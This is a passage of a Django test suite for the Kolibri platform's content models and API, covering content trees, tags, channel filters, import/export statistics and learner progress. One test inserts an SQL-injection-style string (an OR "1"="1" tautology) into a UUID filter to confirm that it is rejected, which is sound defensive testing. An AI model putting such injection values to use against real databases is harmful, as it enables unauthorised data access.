c1 = content.ContentNode.objects.get(title="c1")
root = content.ContentNode.objects.get(title="root")
# if root is the prerequisite of c1
expected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = content.ContentNode.objects.filter(has_prerequisite=root)
self.assertEqual(set(expected_output), set(actual_output))
# then c1 should not be the prerequisite of root
unexpected_output = content.ContentNode.objects.filter(title__in=["root"])
actual_output = content.ContentNode.objects.filter(has_prerequisite=c1)
self.assertNotEqual(set(actual_output), set(unexpected_output))
def test_get_all_related(self):
"""
test the nondirectional characteristic of related relationship
"""
c1 = content.ContentNode.objects.get(title="c1")
c2 = content.ContentNode.objects.get(title="c2")
# if c1 is related to c2
expected_output = content.ContentNode.objects.filter(title__in=["c2"])
actual_output = content.ContentNode.objects.filter(related=c1)
self.assertEqual(set(expected_output), set(actual_output))
# then c2 should be related to c1
expected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = content.ContentNode.objects.filter(related=c2)
self.assertEqual(set(expected_output), set(actual_output))
def test_descendants_of_kind(self):
p = content.ContentNode.objects.get(title="root")
expected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = p.get_descendants(include_self=False).filter(
kind=content_kinds.VIDEO
)
self.assertEqual(set(expected_output), set(actual_output))
def test_get_top_level_topics(self):
p = content.ContentNode.objects.get(title="root")
expected_output = content.ContentNode.objects.filter(
parent=p, kind=content_kinds.TOPIC
)
actual_output = (
content.ContentNode.objects.get(title="root")
.get_children()
.filter(kind=content_kinds.TOPIC)
)
self.assertEqual(set(expected_output), set(actual_output))
def test_tag_str(self):
# test for ContentTag __str__
p = content.ContentTag.objects.get(tag_name="tag_2")
self.assertEqual(str(p), "tag_2")
def test_lang_str(self):
# test for Language __str__
p = content.Language.objects.get(lang_code="en")
self.assertEqual(str(p), "English-Test")
def test_channelmetadata_str(self):
# test for ChannelMetadata __str__
p = content.ChannelMetadata.objects.get(name="testing")
self.assertEqual(str(p), "testing")
def test_tags(self):
root_tag_count = content.ContentNode.objects.get(title="root").tags.count()
self.assertEqual(root_tag_count, 3)
c1_tag_count = content.ContentNode.objects.get(title="c1").tags.count()
self.assertEqual(c1_tag_count, 1)
c2_tag_count = content.ContentNode.objects.get(title="c2").tags.count()
self.assertEqual(c2_tag_count, 1)
c2c1_tag_count = content.ContentNode.objects.get(title="c2c1").tags.count()
self.assertEqual(c2c1_tag_count, 0)
def test_local_files(self):
self.assertTrue(
content.LocalFile.objects.filter(
id="9f9438fe6b0d42dd8e913d7d04cfb2b2"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="725257a0570044acbd59f8cf6a68b2be"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="e00699f859624e0f875ac6fe1e13d648"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="4c30dc7619f74f97ae2ccd4fffd09bf2"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="8ad3fffedf144cba9492e16daec1e39a"
).exists()
)
def test_delete_tree(self):
channel = content.ChannelMetadata.objects.first()
channel_id = channel.id
channel.delete_content_tree_and_files()
self.assertFalse(
content.ContentNode.objects.filter(channel_id=channel_id).exists()
)
self.assertFalse(content.File.objects.all().exists())
class ContentNodeQuerysetTestCase(TestCase):
fixtures = ["content_test.json"]
the_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = Facility.objects.create(name="facility")
cls.admin = FacilityUser.objects.create(username="admin", facility=cls.facility)
cls.admin.set_password(DUMMY_PASSWORD)
cls.admin.save()
cls.facility.add_admin(cls.admin)
def test_filter_uuid(self):
content_ids = content.ContentNode.objects.values_list("id", flat=True)
self.assertEqual(
content.ContentNode.objects.filter_by_uuids(content_ids).count(),
len(content_ids),
)
def test_filter_uuid_bad_uuid(self):
content_ids = list(content.ContentNode.objects.values_list("id", flat=True))
content_ids[0] = '7d1bOR"1"="1"d08e29c36115f1af3da99'
self.assertEqual(
content.ContentNode.objects.filter_by_uuids(content_ids).count(), 0
)
kind_activity_map = {
content_kinds.EXERCISE: "practice",
content_kinds.VIDEO: "watch",
content_kinds.AUDIO: "listen",
content_kinds.DOCUMENT: "read",
content_kinds.HTML5: "explore",
}
def infer_learning_activity(kind):
activity = kind_activity_map.get(kind)
if activity:
return [activity]
return []
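# For example, infer_learning_activity(content_kinds.VIDEO) returns ["watch"],
# while a kind with no mapping (e.g. content_kinds.TOPIC) returns [].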
class ContentNodeAPITestCase(APITestCase):
"""
Testcase for content API methods
"""
fixtures = ["content_test.json"]
the_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = Facility.objects.create(name="facility")
cls.admin = FacilityUser.objects.create(username="admin", facility=cls.facility)
cls.admin.set_password(DUMMY_PASSWORD)
cls.admin.save()
cls.facility.add_admin(cls.admin)
def test_prerequisite_for_filter(self):
c1_id = content.ContentNode.objects.get(title="c1").id
response = self.client.get(
reverse("kolibri:core:contentnode-list"), data={"prerequisite_for": c1_id}
)
self.assertEqual(response.data[0]["title"], "root")
def test_has_prerequisite_filter(self):
root_id = content.ContentNode.objects.get(title="root").id
response = self.client.get(
reverse("kolibri:core:contentnode-list"), data={"has_prerequisite": root_id}
)
self.assertEqual(response.data[0]["title"], "c1")
def test_related_filter(self):
c1_id = content.ContentNode.objects.get(title="c1").id
response = self.client.get(
reverse("kolibri:core:contentnode-list"), data={"related": c1_id}
)
self.assertEqual(response.data[0]["title"], "c2")
def map_language(self, lang):
if lang:
return {
f: getattr(lang, f)
for f in [
"id",
"lang_code",
"lang_subcode",
"lang_name",
"lang_direction",
]
}
def _assert_node(self, actual, expected):
assessmentmetadata = (
expected.assessmentmetadata.all()
.values(
"assessment_item_ids",
"number_of_assessments",
"mastery_model",
"randomize",
"is_manipulable",
"contentnode",
)
.first()
)
files = []
for f in expected.files.all():
"local_file__id",
"local_file__available",
"local_file__file_size",
"local_file__extension",
"lang_id",
file = {}
for field in [
"id",
"priority",
"preset",
"supplementary",
"thumbnail",
]:
file[field] = getattr(f, field)
file["checksum"] = f.local_file_id
for field in [
"available",
"file_size",
"extension",
]:
file[field] = getattr(f.local_file, field)
file["lang"] = self.map_language(f.lang)
file["storage_url"] = f.get_storage_url()
files.append(file)
self.assertEqual(
actual,
{
"id": expected.id,
"available": expected.available,
"author": expected.author,
"channel_id": expected.channel_id,
"coach_content": expected.coach_content,
"content_id": expected.content_id,
"description": expected.description,
"duration": None,
"learning_activities": infer_learning_activity(expected.kind),
"kind": expected.kind,
"lang": self.map_language(expected.lang),
"license_description": expected.license_description,
"license_name": expected.license_name,
"license_owner": expected.license_owner,
"num_coach_contents": expected.num_coach_contents,
"options": expected.options,
"parent": expected.parent_id,
"sort_order": expected.sort_order,
"title": expected.title,
"lft": expected.lft,
"rght": expected.rght,
"tree_id": expected.tree_id,
"ancestors": list(expected.get_ancestors().values("id", "title")),
"tags": list(
expected.tags.all()
.order_by("tag_name")
.values_list("tag_name", flat=True)
),
"assessmentmetadata": assessmentmetadata,
"is_leaf": expected.kind != "topic",
"files": files,
},
)
def _assert_nodes(self, data, nodes):
for actual, expected in zip(data, nodes):
self._assert_node(actual, expected)
def test_contentnode_list(self):
root = content.ContentNode.objects.get(title="root")
nodes = root.get_descendants(include_self=True).filter(available=True)
expected_output = len(nodes)
response = self.client.get(reverse("kolibri:core:contentnode-list"))
self.assertEqual(len(response.data), expected_output)
self._assert_nodes(response.data, nodes)
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_list_long(self):
# This will make > 1000 nodes which should test our ancestor batching behaviour
builder = ChannelBuilder(num_children=10)
builder.insert_into_default_db()
content.ContentNode.objects.update(available=True)
nodes = content.ContentNode.objects.filter(available=True)
expected_output = len(nodes)
self.assertGreater(expected_output, 1000)
response = self.client.get(reverse("kolibri:core:contentnode-list"))
self.assertEqual(len(response.data), expected_output)
self._assert_nodes(response.data, nodes)
def _recurse_and_assert(self, data, nodes, recursion_depth=0):
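        # Walks the serialized tree alongside the ORM nodes. When a "more" cursor is
        # returned it should point back at the parent node and carry the pagination
        # params a client would re-request with: lft__gt appears to be the rght value
        # of the 25th child (i.e. a page size of 25) and depth is the remaining depth.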
for actual, expected in zip(data, nodes):
children = actual.pop("children", None)
self._assert_node(actual, expected)
if children:
child_nodes = content.ContentNode.objects.filter(
available=True, parent=expected
)
if children["more"] is None:
self.assertEqual(len(child_nodes), len(children["results"]))
else:
self.assertGreater(len(child_nodes), len(children["results"]))
self.assertEqual(children["more"]["id"], expected.id)
self.assertEqual(
children["more"]["params"]["lft__gt"], child_nodes[24].rght
)
self.assertEqual(
children["more"]["params"]["depth"], 2 - recursion_depth
)
self._recurse_and_assert(
children["results"],
child_nodes,
recursion_depth=recursion_depth + 1,
)
def test_contentnode_tree(self):
root = content.ContentNode.objects.get(title="root")
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id})
)
self._recurse_and_assert([response.data], [root])
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_tree_long(self):
builder = ChannelBuilder(levels=2, num_children=30)
builder.insert_into_default_db()
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(id=builder.root_node["id"])
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id})
)
self._recurse_and_assert([response.data], [root])
def test_contentnode_tree_depth_1(self):
root = content.ContentNode.objects.get(title="root")
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id}),
data={"depth": 1},
)
self._recurse_and_assert([response.data], [root])
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_tree_lft__gt(self):
builder = ChannelBuilder(levels=2, num_children=30)
builder.insert_into_default_db()
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(id=builder.root_node["id"])
lft__gt = content.ContentNode.objects.filter(parent=root)[24].rght
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id}),
data={"lft__gt": lft__gt},
)
self.assertEqual(len(response.data["children"]["results"]), 5)
self.assertIsNone(response.data["children"]["more"])
first_node = content.ContentNode.objects.filter(parent=root)[25]
self._recurse_and_assert(
[response.data["children"]["results"][0]], [first_node], recursion_depth=1
)
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_tree_more(self):
builder = ChannelBuilder(levels=2, num_children=30)
builder.insert_into_default_db()
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(id=builder.root_node["id"])
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id})
)
first_child = response.data["children"]["results"][0]
self.assertEqual(first_child["children"]["more"]["params"]["depth"], 1)
nested_page_response = self.client.get(
reverse(
"kolibri:core:contentnode_tree-detail",
kwargs={"pk": first_child["children"]["more"]["id"]},
),
data=first_child["children"]["more"]["params"],
)
self.assertEqual(len(nested_page_response.data["children"]["results"]), 5)
self.assertIsNone(nested_page_response.data["children"]["more"])
@mock.patch("kolibri.core.content.api.get_channel_stats_from_studio")
def test_contentnode_granular_network_import(self, stats_mock):
c1 = content.ContentNode.objects.get(title="root")
c1_id = c1.id
c2_id = content.ContentNode.objects.get(title="c1").id
c3_id = content.ContentNode.objects.get(title="c2").id
content.ContentNode.objects.all().update(available=False)
stats = {
c1_id: {
"total_resources": 2,
"coach_content": False,
"num_coach_contents": 0,
},
c2_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
c3_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
}
stats_mock.return_value = stats
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id})
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "root",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 2,
"on_device_resources": 0,
"coach_content": False,
"importable": True,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
"ancestors": list(c1.get_ancestors().values("id", "title")),
"children": [
{
"id": c2_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
{
"id": c3_id,
"title": "c2",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
],
},
)
@mock.patch("kolibri.core.content.api.get_channel_stats_from_disk")
def test_contentnode_granular_local_import(self, stats_mock):
content.LocalFile.objects.update(available=False)
content.ContentNode.objects.update(available=False)
c1 = content.ContentNode.objects.get(title="root")
c1_id = c1.id
c2_id = content.ContentNode.objects.get(title="c1").id
c3_id = content.ContentNode.objects.get(title="c2").id
stats = {
c1_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
c3_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
}
stats_mock.return_value = stats
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
{"importing_from_drive_id": "123"},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "root",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
"ancestors": list(c1.get_ancestors().values("id", "title")),
"children": [
{
"id": c2_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 0,
"on_device_resources": 0,
"importable": False,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
{
"id": c3_id,
"title": "c2",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
],
},
)
@mock.patch("kolibri.core.content.api.get_channel_stats_from_peer")
def test_contentnode_granular_remote_import(self, stats_mock):
content.LocalFile.objects.update(available=False)
content.ContentNode.objects.update(available=False)
c1 = content.ContentNode.objects.get(title="root")
c1_id = c1.id
c2_id = content.ContentNode.objects.get(title="c1").id
c3_id = content.ContentNode.objects.get(title="c2").id
stats = {
c1_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
c3_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
}
stats_mock.return_value = stats
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
{"importing_from_peer_id": "test"},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "root",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
"ancestors": list(c1.get_ancestors().values("id", "title")),
"children": [
{
"id": c2_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 0,
"on_device_resources": 0,
"importable": False,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
{
"id": c3_id,
"title": "c2",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
],
},
)
def test_contentnode_granular_export_available(self):
c1 = content.ContentNode.objects.get(title="c1")
c1_id = c1.id
content.ContentNode.objects.filter(title="c1").update(on_device_resources=1)
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
data={"for_export": True},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": True,
"total_resources": 1,
"on_device_resources": 1,
"importable": None,
"children": [],
"coach_content": False,
"num_coach_contents": 0,
"new_resource": None,
"num_new_resources": None,
"updated_resource": None,
"ancestors": list(c1.get_ancestors().values("id", "title")),
},
)
def test_contentnode_granular_export_unavailable(self):
c1 = content.ContentNode.objects.get(title="c1")
c1_id = c1.id
content.ContentNode.objects.filter(title="c1").update(available=False)
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
data={"for_export": True},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 0,
"on_device_resources": 0,
"importable": None,
"children": [],
"coach_content": False,
"num_coach_contents": 0,
"new_resource": None,
"num_new_resources": None,
"updated_resource": None,
"ancestors": list(c1.get_ancestors().values("id", "title")),
},
)
def test_contentnode_retrieve(self):
c1_id = content.ContentNode.objects.get(title="c1").id
response = self.client.get(
reverse("kolibri:core:contentnode-detail", kwargs={"pk": c1_id})
)
self.assertEqual(response.data["id"], c1_id.__str__())
def test_contentnode_descendants_assessments_exercise_node(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
c1_id = c1.id
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": c1_id},
)
self.assertEqual(
next(
item["num_assessments"] for item in response.data if item["id"] == c1_id
),
c1.assessmentmetadata.first().number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_parent(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
parent = c1.parent
parent_id = parent.id
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": parent_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == parent_id
),
c1.assessmentmetadata.first().number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_root(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
root = content.ContentNode.objects.get(parent__isnull=True)
root_id = root.id
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": root_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == root_id
),
c1.assessmentmetadata.first().number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_parent_sum_siblings(self):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
parent = c1.parent
parent_id = parent.id
sibling = content.ContentNode.objects.create(
pk="6a406ac66b224106aa2e93f73a94333d",
channel_id=c1.channel_id,
content_id="ded4a083e75f4689b386fd2b706e792a",
kind=content_kinds.EXERCISE,
parent=parent,
title="sibling exercise",
available=True,
)
sibling_assessment_metadata = content.AssessmentMetaData.objects.create(
id="6a406ac66b224106aa2e93f73a94333d",
contentnode=sibling,
number_of_assessments=5,
)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": parent_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == parent_id
),
c1.assessmentmetadata.first().number_of_assessments
+ sibling_assessment_metadata.number_of_assessments,
)
def test_contentnode_descendants_assessments_exercise_parent_sum_siblings_one_unavailable(
self,
):
c1 = content.ContentNode.objects.filter(kind=content_kinds.EXERCISE).first()
c1.available = False
c1.save()
parent = c1.parent
parent_id = parent.id
sibling = content.ContentNode.objects.create(
pk="6a406ac66b224106aa2e93f73a94333d",
channel_id=c1.channel_id,
content_id="ded4a083e75f4689b386fd2b706e792a",
kind=content_kinds.EXERCISE,
parent=parent,
title="sibling exercise",
available=True,
)
sibling_assessment_metadata = content.AssessmentMetaData.objects.create(
id="6a406ac66b224106aa2e93f73a94333d",
contentnode=sibling,
number_of_assessments=5,
)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants-assessments"),
data={"ids": parent_id},
)
self.assertEqual(
next(
item["num_assessments"]
for item in response.data
if item["id"] == parent_id
),
sibling_assessment_metadata.number_of_assessments,
)
def test_contentnode_descendants_topic_siblings_ancestor_ids(self):
root = content.ContentNode.objects.get(parent__isnull=True)
topics = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC
)
topic_ids = topics.values_list("id", flat=True)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={"ids": ",".join(topic_ids)},
)
for datum in response.data:
topic = topics.get(id=datum["ancestor_id"])
self.assertTrue(topic.get_descendants().filter(id=datum["id"]).exists())
def test_contentnode_descendants_topic_siblings_kind_filter(self):
root = content.ContentNode.objects.get(parent__isnull=True)
topics = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC
)
topic_ids = topics.values_list("id", flat=True)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={
"ids": ",".join(topic_ids),
"descendant_kind": content_kinds.EXERCISE,
},
)
for datum in response.data:
topic = topics.get(id=datum["ancestor_id"])
self.assertTrue(
topic.get_descendants()
.filter(id=datum["id"], kind=content_kinds.EXERCISE)
.exists()
)
def test_contentnode_descendants_topic_parent_child_ancestor_ids(self):
root = content.ContentNode.objects.get(parent__isnull=True)
topic = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC, children__isnull=False
).first()
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={"ids": ",".join((root.id, topic.id))},
)
topic_items = [
datum for datum in response.data if datum["ancestor_id"] == topic.id
]
for node in topic.get_descendants(include_self=False).filter(available=True):
self.assertTrue(next(item for item in topic_items if item["id"] == node.id))
root_items = [
datum for datum in response.data if datum["ancestor_id"] == root.id
]
for node in root.get_descendants(include_self=False).filter(available=True):
self.assertTrue(next(item for item in root_items if item["id"] == node.id))
def test_contentnode_descendants_availability(self):
content.ContentNode.objects.all().update(available=False)
root = content.ContentNode.objects.get(parent__isnull=True)
topics = content.ContentNode.objects.filter(
parent=root, kind=content_kinds.TOPIC
)
topic_ids = topics.values_list("id", flat=True)
response = self.client.get(
reverse("kolibri:core:contentnode-descendants"),
data={"ids": ",".join(topic_ids)},
)
self.assertEqual(len(response.data), 0)
def test_contentnode_node_assessments_available(self):
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(parent__isnull=True)
exercise_ids = (
root.get_descendants()
.filter(kind=content_kinds.EXERCISE)
.values_list("id", flat=True)
)
response = self.client.get(
reverse("kolibri:core:contentnode-node-assessments"),
data={"ids": ",".join(exercise_ids)},
)
self.assertEqual(response.data, 1)
def test_contentnode_node_assessments_not_available(self):
content.ContentNode.objects.all().update(available=False)
root = content.ContentNode.objects.get(parent__isnull=True)
exercise_ids = (
root.get_descendants()
.filter(kind=content_kinds.EXERCISE)
.values_list("id", flat=True)
)
response = self.client.get(
reverse("kolibri:core:contentnode-node-assessments"),
data={"ids": ",".join(exercise_ids)},
)
self.assertEqual(response.data, 0)
def test_contentnode_recommendations(self):
node_id = content.ContentNode.objects.get(title="c2c2").id
response = self.client.get(
reverse(
"kolibri:core:contentnode-recommendations-for", kwargs={"pk": node_id}
)
)
self.assertEqual(len(response.data), 2)
def test_contentnode_recommendations_does_error_for_unavailable_node(self):
node = content.ContentNode.objects.get(title="c2c2")
node.available = False
node.save()
node_id = node.id
response = self.client.get(
reverse(
"kolibri:core:contentnode-recommendations-for", kwargs={"pk": node_id}
)
)
self.assertEqual(response.status_code, 404)
def test_contentnode_ids(self):
titles = ["c2c2", "c2c3"]
nodes = [content.ContentNode.objects.get(title=title) for title in titles]
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"ids": ",".join([n.id for n in nodes])},
)
self.assertEqual(len(response.data), 2)
for i in range(len(titles)):
self.assertEqual(response.data[i]["title"], titles[i])
def test_contentnode_parent(self):
parent = content.ContentNode.objects.get(title="c2")
children = parent.get_children()
response = self.client.get(
reverse("kolibri:core:contentnode-list"),
data={"parent": parent.id, "include_coach_content": False},
)
self.assertEqual(len(response.data), children.count())
for i in range(len(children)):
self.assertEqual(response.data[i]["title"], children[i].title)
def test_contentnode_tags(self):
expected = {
"root": ["tag_1", "tag_2", "tag_3"],
"c1": ["tag_1"],
"c2": ["tag_2"],
}
for title, tags in expected.items():
node = content.ContentNode.objects.get(title=title)
response = self.client.get(
reverse("kolibri:core:contentnode-detail", kwargs={"pk": node.id})
)
self.assertEqual(set(response.data["tags"]), set(tags))
def test_channelmetadata_list(self):
response = self.client.get(reverse("kolibri:core:channel-list", kwargs={}))
self.assertEqual(response.data[0]["name"], "testing")
def test_channelmetadata_retrieve(self):
data = content.ChannelMetadata.objects.values()[0]
response = self.client.get(
reverse("kolibri:core:channel-detail", kwargs={"pk": data["id"]})
)
self.assertEqual(response.data["name"], "testing")
def test_channelmetadata_langfield(self):
data = content.ChannelMetadata.objects.first()
root_lang = content.Language.objects.get(pk=1)
data.root.lang = root_lang
data.root.save()
response = self.client.get(
reverse("kolibri:core:channel-detail", kwargs={"pk": data.id})
)
self.assertEqual(response.data["lang_code"], root_lang.lang_code)
self.assertEqual(response.data["lang_name"], root_lang.lang_name)
def test_channelmetadata_langfield_none(self):
data = content.ChannelMetadata.objects.first()
response = self.client.get(
reverse("kolibri:core:channel-detail", kwargs={"pk": data.id})
)
self.assertEqual(response.data["lang_code"], None)
self.assertEqual(response.data["lang_name"], None)
def test_channelmetadata_content_available_param_filter_lowercase_true(self):
response = self.client.get(
reverse("kolibri:core:channel-list"), {"available": "true"}
)
self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c")
def test_channelmetadata_content_available_param_filter_uppercase_true(self):
response = self.client.get(
reverse("kolibri:core:channel-list"), {"available": True}
)
self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c")
def test_channelmetadata_content_unavailable_param_filter_false(self):
content.ContentNode.objects.filter(title="root").update(available=False)
response = self.client.get(
reverse("kolibri:core:channel-list"), {"available": False}
)
self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c")
def test_channelmetadata_content_available_field_true(self):
response = self.client.get(reverse("kolibri:core:channel-list"))
self.assertEqual(response.data[0]["available"], True)
def test_channelmetadata_content_available_field_false(self):
content.ContentNode.objects.filter(title="root").update(available=False)
response = self.client.get(reverse("kolibri:core:channel-list"))
self.assertEqual(response.data[0]["available"], False)
def test_channelmetadata_has_exercises_filter(self):
# Has nothing else for that matter...
no_exercise_channel = content.ContentNode.objects.create(
pk="6a406ac66b224106aa2e93f73a94333d",
channel_id="f8ec4a5d14cd4716890999da596032d2",
content_id="ded4a083e75f4689b386fd2b706e792a",
kind="topic",
title="no exercise channel",
)
content.ChannelMetadata.objects.create(
id="63acff41781543828861ade41dbdd7ff",
name="no exercise channel metadata",
root=no_exercise_channel,
)
no_filter_response = self.client.get(reverse("kolibri:core:channel-list"))
self.assertEqual(len(no_filter_response.data), 2)
with_filter_response = self.client.get(
reverse("kolibri:core:channel-list"), {"has_exercise": True}
)
self.assertEqual(len(with_filter_response.data), 1)
self.assertEqual(with_filter_response.data[0]["name"], "testing")
def test_file_list(self):
response = self.client.get(reverse("kolibri:core:file-list"))
self.assertEqual(len(response.data), 5)
def test_file_retrieve(self):
response = self.client.get(
reverse(
"kolibri:core:file-detail",
kwargs={"pk": "6bdfea4a01830fdd4a585181c0b8068c"},
)
)
self.assertEqual(response.data["preset"], "high_res_video")
def _setup_contentnode_progress(self):
# set up data for testing progress_fraction field on content node endpoint
facility = Facility.objects.create(name="MyFac")
user = FacilityUser.objects.create(username="learner", facility=facility)
user.set_password("pass")
user.save()
root = content.ContentNode.objects.get(title="root")
c1 = content.ContentNode.objects.get(title="c1")
c2 = content.ContentNode.objects.get(title="c2")
c2c1 = content.ContentNode.objects.get(title="c2c1")
c2c3 = content.ContentNode.objects.get(title="c2c3")
for node, progress in [(c2c1, 0.7), (c2c3, 0.5)]:
ContentSummaryLog.objects.create(
user=user,
content_id=node.content_id,
progress=progress,
channel_id=self.the_channel_id,
start_timestamp=datetime.datetime.now(),
)
return facility, root, c1, c2, c2c1, c2c3
def test_contentnode_progress_detail_endpoint(self):
facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()
def assert_progress(node, progress):
response = self.client.get(
reverse(
"kolibri:core:contentnodeprogress-detail", kwargs={"pk": node.id}
)
)
self.assertEqual(response.data["progress_fraction"], progress)
# check that there is no progress when not logged in
assert_progress(root, 0)
assert_progress(c1, 0)
assert_progress(c2, 0)
assert_progress(c2c1, 0)
# check that progress is calculated appropriately when user is logged in
self.client.login(username="learner", password="pass", facility=facility)
# The progress endpoint is used, so should report progress for topics
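        # These values are consistent with topic progress being averaged over available
        # descendant resources in the fixture: (0.7 + 0.5) / 5 = 0.24 for root and
        # (0.7 + 0.5) / 3 = 0.4 for c2, assuming root has 5 and c2 has 3 such resources.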
assert_progress(root, 0.24)
assert_progress(c1, 0)
assert_progress(c2, 0.4)
assert_progress(c2c1, 0.7)
def test_contentnode_progress_list_endpoint(self):
facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()
response = self.client.get(reverse("kolibri:core:contentnodeprogress-list"))
def get_progress_fraction(node):
return list(filter(lambda x: x["id"] == node.id, response.data))[0][
"progress_fraction"
]
# check that there is no progress when not logged in
self.assertEqual(get_progress_fraction(root), 0)
self.assertEqual(get_progress_fraction(c1), 0)
